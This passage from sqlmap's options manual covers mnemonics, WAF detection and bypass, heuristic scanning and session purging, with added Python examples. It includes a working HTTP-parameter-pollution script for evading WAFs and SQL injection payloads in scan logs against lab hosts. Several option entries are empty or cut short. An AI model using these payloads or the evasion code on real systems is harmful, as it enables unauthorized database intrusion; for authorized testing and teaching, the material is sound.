    Miscellaneous

    Option: -z

    Typing every option and switch you want to use is tedious, especially for those used most often (e.g. --batch --random-agent --ignore-proxy --technique=BEU). There is a shorter way: in sqlmap it is called "mnemonics".

    With option -z, each option and switch can be written in a shorter mnemonic form, separated by commas (,), where a mnemonic is an arbitrarily chosen leading part of the original name. Options and switches are not strictly mapped to fixed abbreviations; the only requirement is that no other option or switch shares the same prefix.

    For example, the command:

    $ python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "www.target.com/vuln.php?id=1"

    can be written in short mnemonic form (one of several possibilities) as:

    $ python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=1"

    Another example:

    $ python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u "www.target.com/vuln.php?id=1"

    can be written in short mnemonic form as:

    $ python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.com/vuln.php?id=1"

    Alert on successful SQL injection detection

    Option: --alert

    Set answers for questions

    Option: --answers

    If you want questions answered automatically, even when --batch is used, you can do so by giving part of the question text, an equals sign and the answer. Answers to different questions are separated with the , delimiter.

    Example against a MySQL target:

    Make a beep sound when SQL injection is found

    Switch: --beep

    With switch --beep, sqlmap emits a beep the moment an SQL injection is found. This is especially useful when testing a large list of target URLs (option -m).

    Clean up the DBMS of sqlmap-specific UDF(s) and tables

    Switch: --cleanup

    After taking over the underlying operating system or file system, it is advisable to remove sqlmap's temporary tables (e.g. sqlmapoutput) and user-defined functions from the back-end DBMS. Switch --cleanup cleans the DBMS and file system as far as possible.

    Check dependencies

    Switch: --dependencies

    sqlmap relies on third-party Python libraries for some features (direct DBMS connections, NTLM authentication, WebSocket targets). Switch --dependencies reports which of them are missing:

    $ python sqlmap.py --dependencies
    [...]
    [xx:xx:28] [WARNING] sqlmap requires 'python-kinterbasdb' third-party library in order to directly connect to the DBMS Firebird. Download from http://kinterbasdb.sourceforge.net/
    [xx:xx:28] [WARNING] sqlmap requires 'python-pymssql' third-party library in order to directly connect to the DBMS Sybase. Download from http://pymssql.sourceforge.net/
    [xx:xx:28] [WARNING] sqlmap requires 'python pymysql' third-party library in order to directly connect to the DBMS MySQL. Download from https://github.com/petehunt/PyMySQL/
    [xx:xx:28] [WARNING] sqlmap requires 'python cx_Oracle' third-party library in order to directly connect to the DBMS Oracle. Download from http://cx-oracle.sourceforge.net/
    [xx:xx:28] [WARNING] sqlmap requires 'python-psycopg2' third-party library in order to directly connect to the DBMS PostgreSQL. Download from http://initd.org/psycopg/
    [xx:xx:28] [WARNING] sqlmap requires 'python ibm-db' third-party library in order to directly connect to the DBMS IBM DB2. Download from http://code.google.com/p/ibm-db/
    [xx:xx:28] [WARNING] sqlmap requires 'python jaydebeapi & python-jpype' third-party library in order to directly connect to the DBMS HSQLDB. Download from https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/
    [xx:xx:28] [WARNING] sqlmap requires 'python-pyodbc' third-party library in order to directly connect to the DBMS Microsoft Access. Download from http://pyodbc.googlecode.com/
    [xx:xx:28] [WARNING] sqlmap requires 'python-pymssql' third-party library in order to directly connect to the DBMS Microsoft SQL Server. Download from http://pymssql.sourceforge.net/
    [xx:xx:28] [WARNING] sqlmap requires 'python-ntlm' third-party library if you plan to attack a web application behind NTLM authentication. Download from http://code.google.com/p/python-ntlm/
    [xx:xx:28] [WARNING] sqlmap requires 'websocket-client' third-party library if you plan to attack a web application using WebSocket. Download from https://pypi.python.org/pypi/websocket-client/

    Disable console output coloring

    Switch: --disable-coloring

    By default, sqlmap colors its console output. You can disable coloring with this switch to avoid unwanted effects, such as unparsed ANSI color codes showing up in the console (e.g. \x01\x1b[0;32m\x02[INFO]).

    Use Google dork results from a specified page number

    Option: --gpage

    By default, with option -g sqlmap uses the first 100 URLs returned by the Google search for further SQL injection testing. With option --gpage you can specify a page other than the first one from which to retrieve target URLs.

    Use HTTP parameter pollution

    Switch: --hpp

    HTTP parameter pollution (HPP) is a method for bypassing WAF/IPS protection mechanisms and is particularly effective against ASP/IIS and ASP.NET/IIS platforms. If you suspect the target is behind such protection, try this switch to bypass it.
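    Why this works on ASP.NET specifically is easiest to see with the request on one side and the server's reassembly on the other. The script below is an added example, not sqlmap's own implementation of --hpp: it spreads a payload over repeated occurrences of the same parameter and wraps the fragments in /* */ comments, models Request.QueryString joining duplicate values with ",", and runs a naive per-value UNION signature over both forms. The query string and the signature are constructed for the demonstration.

```python
import re
from urllib.parse import parse_qs

# Added example (not sqlmap's own code). Follows the idea behind --hpp: split the
# payload across repeated occurrences of one parameter and wrap fragments in /* */
# comments so that the ',' an ASP.NET back end inserts between duplicate values
# lands inside a comment. SIGNATURE and the sample query are constructed here.

SIGNATURE = re.compile(r"union\s+(all\s+)?select", re.I)   # naive per-value UNION check


def hpp_split(name, payload):
    """Return a query string carrying `payload` spread over repeated `name` parameters."""
    parts = payload.split(" ")
    if len(parts) > 1:
        # each fragment closes the comment opened by the previous one and opens a new one
        parts[0] = parts[0] + "/*"
        parts[1:-1] = ["*/" + p + "/*" for p in parts[1:-1]]
        parts[-1] = "*/" + parts[-1]
    joined = f"&{name}=".join(parts)
    # ASP.NET joins duplicate values with ',', so every literal ',' in the payload can
    # itself become a parameter boundary; the server puts the comma back
    joined = joined.replace(",", f"&{name}=")
    return f"{name}={joined}"


def aspnet_join(query, name):
    """Model Request.QueryString[name] on ASP.NET: all occurrences joined with ','."""
    values = parse_qs(query, keep_blank_values=True).get(name, [])
    return ",".join(values)


def strip_comments(sql):
    """What the SQL parser effectively sees once /* */ comments count as whitespace."""
    return re.sub(r"/\*.*?\*/", " ", sql)


def flagged_per_value(query, name):
    """Inspection the way a naive WAF does it: one parameter value at a time."""
    values = parse_qs(query, keep_blank_values=True).get(name, [])
    return any(SIGNATURE.search(v) for v in values)


if __name__ == "__main__":
    plain = "id=1 UNION ALL SELECT 1,2,3"
    polluted = hpp_split("id", "1 UNION ALL SELECT 1,2,3")
    print(polluted)
    print("server sees:      ", aspnet_join(polluted, "id"))
    print("SQL after comments:", strip_comments(aspnet_join(polluted, "id")))
    print("flagged plain:", flagged_per_value(plain, "id"),
          "| flagged polluted:", flagged_per_value(polluted, "id"))
```

    In a real request the fragments are URL-encoded; parse_qs decodes them, so the model still holds. The transformation only helps where the back end concatenates duplicate values: PHP, for instance, keeps just the last occurrence, which would destroy the payload, and that is why the text above limits the technique to ASP/IIS and ASP.NET/IIS.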

    Test for WAF/IPS protection

    Switch: --identify-waf

    sqlmap can try to identify back-end WAF/IPS protection (if any) so that the user can take appropriate steps (e.g. use tamper scripts via option --tamper). Currently around 30 different products are supported (e.g. Airlock, Barracuda WAF, etc.); the corresponding WAF scripts can be found in the waf directory.

    Example against a MySQL target protected by ModSecurity WAF:

    $ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --identify-waf -v 3
    [...]
    [xx:xx:23] [INFO] testing connection to the target URL
    [xx:xx:23] [INFO] heuristics detected web page charset 'ascii'
    [xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS protection
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'USP Secure Entry Server (United Security Providers)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'BinarySEC Web Application Firewall (BinarySEC)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'Hyperguard Web Application Firewall (art of defence Inc.)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'Cisco ACE XML Gateway (Cisco Systems)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'TrafficShield (F5 Networks)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'KONA Security Solutions (Akamai Technologies)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'Incapsula Web Application Firewall (Incapsula/Imperva)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'CloudFlare Web Application Firewall (CloudFlare)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'Barracuda Web Application Firewall (Barracuda Networks)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'webApp.secure (webScurity)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'Proventia Web Application Security (IBM)'
    [xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1'
    [xx:xx:23] [DEBUG] page not found (404)
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'KS-WAF (Knownsec)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'NetScaler (Citrix Systems)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'Jiasule Web Application Firewall (Jiasule)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'WebKnight Application Firewall (AQTRONIX)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'AppWall (Radware)'
    [xx:xx:23] [DEBUG] checking for WAF/IPS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)'
    [xx:xx:23] [CRITICAL] WAF/IPS identified 'ModSecurity: Open Source Web Application Firewall (Trustwave)'. Please consider usage of tamper scripts (option '--tamper')

    Skip heuristic detection of WAF/IPS protection

    Switch: --skip-waf

    By default, sqlmap automatically sends, in one of the starting requests, a dummy parameter whose value contains a deliberately "suspicious" SQL injection payload (e.g. ...&foobar=AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1). If the target responds differently than it does to the original request, there is a good chance that it sits behind some kind of protection mechanism. In case of any problems, the user can disable this mechanism with switch --skip-waf.

    Imitate a smartphone

    Switch: --mobile

    Sometimes web servers expose a different interface to mobile phones than to desktop computers. In such cases you can force a predefined smartphone HTTP User-Agent header value. With this switch, sqlmap asks you to pick one of several popular smartphones, which it then imitates for the current run.

    Example run:

    $ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile
    [...]
    which smartphone do you want sqlmap to imitate through HTTP User-Agent header?
    [1] Apple iPhone 4s (default)
    [2] BlackBerry 9900
    [3] Google Nexus 7
    [4] HP iPAQ 6365
    [5] HTC Sensation
    [6] Nokia N97
    [7] Samsung Galaxy S
    > 1
    [...]

    Work in offline mode

    Switch: --offline

    With switch --offline, sqlmap uses only data from a previous session for data enumeration. This basically means zero connection attempts during such a run.

    Safely remove all content from the data directory

    Switch: --purge

    If you decide to safely remove everything in sqlmap's data directory (e.g. $HOME/.sqlmap), including the details of all targets from previous sqlmap runs, use switch --purge. While purging, every file in the data directory and its (sub)directories is overwritten with random data, truncated and renamed to a random name; the (sub)directories are renamed to random names as well; finally the whole directory tree is deleted.

    Example run:
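    The steps listed above map onto a short routine. The one below is an added example, not sqlmap's own --purge code: it walks the tree bottom-up, overwrites each file with random bytes in chunks, syncs and truncates it, renames files and directories to random names, and removes the tree. The sample tree built by make_sample_tree() is constructed for the demonstration; symbolic links are unlinked rather than followed so the wipe cannot escape the directory.

```python
import os
import secrets
import shutil
import tempfile

# Added example (not sqlmap's own code): a minimal --purge style routine following
# the steps described above. make_sample_tree() builds a constructed data directory.

CHUNK = 1 << 20  # overwrite in 1 MiB pieces so large files do not go through memory at once


def _random_name():
    return secrets.token_hex(8)


def _wipe_file(path):
    size = os.path.getsize(path)
    with open(path, "r+b") as fh:
        remaining = size
        while remaining > 0:
            n = min(remaining, CHUNK)
            fh.write(os.urandom(n))
            remaining -= n
        fh.flush()
        os.fsync(fh.fileno())   # push the random data to the device before truncating
        fh.truncate(0)


def purge(root):
    """Wipe and delete everything under `root`; returns the number of files overwritten."""
    root = os.path.abspath(root)
    if not os.path.isdir(root) or os.path.islink(root):
        raise ValueError(f"{root!r} is not a directory")
    wiped = 0
    # bottom-up: children are handled before their parent directory gets renamed
    for dirpath, dirnames, filenames in os.walk(root, topdown=False):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            if os.path.islink(path):          # never follow links out of the tree
                os.unlink(path)
                continue
            _wipe_file(path)
            os.rename(path, os.path.join(dirpath, _random_name()))
            wiped += 1
        for dn in dirnames:
            path = os.path.join(dirpath, dn)
            if os.path.islink(path):
                os.unlink(path)
            else:
                os.rename(path, os.path.join(dirpath, _random_name()))
    shutil.rmtree(root)
    return wiped


def make_sample_tree():
    """Constructed stand-in for a data directory: three files across two levels."""
    root = tempfile.mkdtemp(prefix="purge-demo-")
    os.makedirs(os.path.join(root, "output", "target.example"))
    for rel, data in (("output/target.example/session.sqlite", b"x" * 4096),
                      ("output/target.example/log", b"[INFO] fetched data\n"),
                      ("hashes", b"")):
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(data)
    return root


def demo():
    """Build a sample tree, purge it, report (files wiped, directory still exists)."""
    root = make_sample_tree()
    wiped = purge(root)
    return wiped, os.path.exists(root)


if __name__ == "__main__":
    print(demo())
```

    Overwriting in place is only as safe as the storage underneath: SSD wear levelling, copy-on-write or journaling file systems, snapshots and backups can all keep the old blocks, so "safely" here means "better than a plain delete", not a guarantee.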

    Conduct thorough tests only if positive heuristic(s)

    Switch: --smart

    In some cases a user has a long list of potential target URLs (e.g. via option -m) and wants to find vulnerable targets as quickly as possible. With switch --smart, only parameters for which a DBMS error can be provoked are used in further scans; the rest are skipped.

    Example against a MySQL target:

    $ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart
    [...]
    [xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic
    [xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic
    [xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable
    [xx:xx:14] [INFO] skipping GET parameter 'ca'
    [xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic
    [xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic
    [xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable
    [xx:xx:14] [INFO] skipping GET parameter 'user'
    [xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic
    [xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic
    [xx:xx:14] [INFO] GET parameter 'id' is dynamic
    [xx:xx:14] [WARNING] reflective value(s) found and filtering out
    [xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
    [xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'
    heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
    do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y
    [xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
    [xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
    [xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
    [xx:xx:14] [INFO] testing 'MySQL inline queries'
    [xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
    [xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
    [xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
    [xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
    [xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
    [xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
    [xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
    [xx:xx:24] [INFO] target URL appears to have 3 columns in query
    [xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
    [...]
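    Both heuristics on this page, the WAF/IPS probe that --skip-waf turns off and the "does this parameter provoke a DBMS error" filter behind --smart, are response comparisons. The script below is an added example, not sqlmap's own code, run against a constructed stand-in target with the same three parameters as the log above: it sends the dummy foobar parameter and compares status and body with the plain request, then appends query-breaking characters to each parameter and keeps only those whose response carries a DBMS error signature. DBMS_ERRORS is a small hand-picked subset of well-known error texts (sqlmap ships a far larger list in xml/errors.xml) and the 0.9 similarity threshold is arbitrary.

```python
import re
from difflib import SequenceMatcher

# Added example (not sqlmap's own code) for the two heuristics described above.
# fake_target() is a constructed stand-in for the HTTP target; DBMS_ERRORS is a
# hand-picked subset of well-known error messages; the threshold is arbitrary.

DBMS_ERRORS = {
    "MySQL": [r"You have an error in your SQL syntax", r"Warning.*mysql_\w+\(\)"],
    "Microsoft SQL Server": [r"Unclosed quotation mark after the character string",
                             r"Microsoft OLE DB Provider for SQL Server"],
    "PostgreSQL": [r"PostgreSQL.*ERROR", r"Warning.*pg_\w+\(\)"],
    "Oracle": [r"\bORA-\d{5}\b"],
}

WAF_PROBE_PARAM = "foobar"
WAF_PROBE_VALUE = ("AND 1=1 UNION ALL SELECT 1,2,3,table_name "
                   "FROM information_schema.tables WHERE 2>1")
HEURISTIC_SUFFIX = "'\")("          # characters that break a quoted or bracketed query


def fake_target(params, waf=False):
    """Constructed target returning (status, body). Only 'id' reaches the database and a
    stray quote in it surfaces a MySQL error; the optional 'WAF' blocks any request
    that mentions information_schema anywhere."""
    raw = "&".join(f"{k}={v}" for k, v in params.items())
    if waf and "information_schema" in raw.lower():
        return 403, "<h1>Request blocked by security policy</h1>"
    ident = params.get("id", "")
    if "'" in ident:
        return 200, ("You have an error in your SQL syntax; check the manual that "
                     "corresponds to your MySQL server version for the right syntax "
                     "to use near ''' at line 1")
    return 200, f"<html>item {ident} in category {params.get('ca', '')}</html>"


def detect_waf(fetch, params, threshold=0.9):
    """--skip-waf heuristic: add a dummy parameter carrying a blatant payload and see
    whether the response (status code or body) differs from the plain request."""
    base_status, base_body = fetch(params)
    probe = dict(params)
    probe[WAF_PROBE_PARAM] = WAF_PROBE_VALUE
    probe_status, probe_body = fetch(probe)
    if base_status != probe_status:
        return True
    return SequenceMatcher(None, base_body, probe_body).ratio() < threshold


def detect_dbms_error(body):
    """Return the DBMS whose error signature appears in `body`, or None."""
    for dbms, patterns in DBMS_ERRORS.items():
        if any(re.search(p, body, re.I | re.S) for p in patterns):
            return dbms
    return None


def error_provoking_params(params, fetch):
    """--smart filter: keep only parameters where a malformed value yields a DBMS error.
    Returns {parameter: dbms}."""
    keep = {}
    for name, value in params.items():
        mutated = dict(params)
        mutated[name] = value + HEURISTIC_SUFFIX
        _, body = fetch(mutated)
        dbms = detect_dbms_error(body)
        if dbms:
            keep[name] = dbms
    return keep


if __name__ == "__main__":
    params = {"ca": "17", "user": "foo", "id": "1"}
    print("WAF suspected (no WAF):", detect_waf(lambda p: fake_target(p), params))
    print("WAF suspected (WAF on):", detect_waf(lambda p: fake_target(p, waf=True), params))
    print("parameters worth testing:", error_provoking_params(params, fake_target))
```

    The error-based filter is fast but deliberately blind: a parameter that is injectable only through boolean or time-based blind techniques never raises a visible error and is skipped, which is the trade-off --smart asks you to accept.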

    Select (or skip) tests by payloads and/or titles

    Option: --test-filter

    If you want to filter tests by their payloads and/or titles, use this option. For example, to test only payloads containing the keyword ROW, use --test-filter=ROW.

    Example against a MySQL target:

    $ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --batch --test-filter=ROW
    [...]
    [xx:xx:39] [INFO] GET parameter 'id' is dynamic
    [xx:xx:39] [WARNING] reflective value(s) found and filtering out
    [xx:xx:39] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
    [xx:xx:39] [INFO] testing for SQL injection on GET parameter 'id'
    [xx:xx:39] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
    [xx:xx:39] [INFO] GET parameter 'id' is 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause' injectable
    GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
    sqlmap identified the following injection points with a total of 3 HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE or HAVING clause
    Payload: id=1 AND ROW(4959,4971)>(SELECT COUNT(*),CONCAT(0x3a6d70623a,(SELECT (CASE WHEN (4959=4959) THEN 1 ELSE 0 END)),0x3a6b7a653a,FLOOR(RAND(0)*2))x FROM (SELECT 4706 UNION SELECT 3536 UNION SELECT 7442 UNION SELECT 3470)a GROUP BY x)
    ---
    [...]

    Option: --test-skip

    If you want to skip tests by their payloads and/or titles, use this option. For example, to skip payloads containing the keyword BENCHMARK, use --test-skip=BENCHMARK.

    Interactive sqlmap shell

    Switch: --sqlmap-shell

    With switch --sqlmap-shell, the user gets an interactive sqlmap shell that keeps a history of all previous runs, including the options and/or switches used:

    $ python sqlmap.py --sqlmap-shell
    sqlmap-shell> -u "http://testphp.vulnweb.com/artists.php?artist=1" --technique=BEU --batch
             _
     ___ ___| |_____ ___ ___  {1.0-dev-2188502}
    |_ -| . |   | | .'| . |
    |___|_  |_|_|_|_|__,|  _|
          |_|       |_|   http://sqlmap.org

    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting at xx:xx:11

    [xx:xx:12] [INFO] testing if the target URL is stable
    [xx:xx:13] [INFO] target URL is stable
    [xx:xx:13] [INFO] testing if GET parameter 'artist' is dynamic
    [xx:xx:13] [INFO] confirming that GET parameter 'artist' is dynamic
    [xx:xx:13] [INFO] GET parameter 'artist' is dynamic
    [xx:xx:13] [INFO] heuristic (basic) test shows that GET parameter 'artist' might be injectable (possible DBMS: 'MySQL')
    [xx:xx:13] [INFO] testing for SQL injection on GET parameter 'artist'
    heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
    for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
    [xx:xx:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [xx:xx:13] [INFO] GET parameter 'artist' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
    [xx:xx:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
    [xx:xx:13] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
    [xx:xx:13] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
    [xx:xx:13] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
    [xx:xx:14] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
    [xx:xx:14] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
    [xx:xx:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
    [xx:xx:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)'
    [xx:xx:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
    [xx:xx:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)'
    [xx:xx:14] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
    [xx:xx:14] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
    [xx:xx:14] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
    [xx:xx:14] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
    [xx:xx:14] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
    [xx:xx:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
    [xx:xx:15] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
    [xx:xx:15] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
    [xx:xx:15] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
    [xx:xx:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
    [xx:xx:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
    [xx:xx:15] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
    [xx:xx:15] [INFO] target URL appears to have 3 columns in query
    [xx:xx:16] [INFO] GET parameter 'artist' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
    GET parameter 'artist' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
    sqlmap identified the following injection point(s) with a total of 39 HTTP(s) requests:
    ---
    Parameter: artist (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: artist=1 AND 5707=5707

        Type: UNION query
        Title: Generic UNION query (NULL) - 3 columns
        Payload: artist=-7983 UNION ALL SELECT CONCAT(0x716b706271,0x6f6c506a747376426d58446f634454616a4c647a6c6a69566e584e454c64666f6861466e697a5069,0x716a786a71),NULL,NULL-- -
    ---
    [xx:xx:16] [INFO] testing MySQL
    [xx:xx:16] [INFO] confirming MySQL
    [xx:xx:16] [INFO] the back-end DBMS is MySQL
    web application technology: Nginx, PHP 5.3.10
    back-end DBMS: MySQL >= 5.0.0
    [xx:xx:16] [INFO] fetched data logged to text files under '/home/stamparm/.sqlmap/output/testphp.vulnweb.com'
    sqlmap-shell> -u "http://testphp.vulnweb.com/artists.php?artist=1" --banner
             _
     ___ ___| |_____ ___ ___  {1.0-dev-2188502}
    |_ -| . |   | | .'| . |
    |___|_  |_|_|_|_|__,|  _|
          |_|       |_|   http://sqlmap.org

    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting at xx:xx:25

    [xx:xx:26] [INFO] resuming back-end DBMS 'mysql'
    [xx:xx:26] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: artist (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: artist=1 AND 5707=5707

        Type: UNION query
        Title: Generic UNION query (NULL) - 3 columns
        Payload: artist=-7983 UNION ALL SELECT CONCAT(0x716b706271,0x6f6c506a747376426d58446f634454616a4c647a6c6a69566e584e454c64666f6861466e697a5069,0x716a786a71),NULL,NULL-- -
    ---
    [xx:xx:26] [INFO] the back-end DBMS is MySQL
    [xx:xx:26] [INFO] fetching banner
    web application technology: Nginx, PHP 5.3.10
    back-end DBMS operating system: Linux Ubuntu
    back-end DBMS: MySQL 5
    banner: '5.1.73-0ubuntu0.10.04.1'
    [xx:xx:26] [INFO] fetched data logged to text files under '/home/stamparm/.sqlmap/output/testphp.vulnweb.com'

    Simple wizard interface for beginner users

    Switch: --wizard

    For beginner users there is a simple wizard interface that uses a workflow with as few questions as possible. If the user just enters the target URL and accepts the default choices (e.g. by pressing Enter), a properly set up sqlmap run should be in place by the end of the workflow.

    Example against a Microsoft SQL Server target: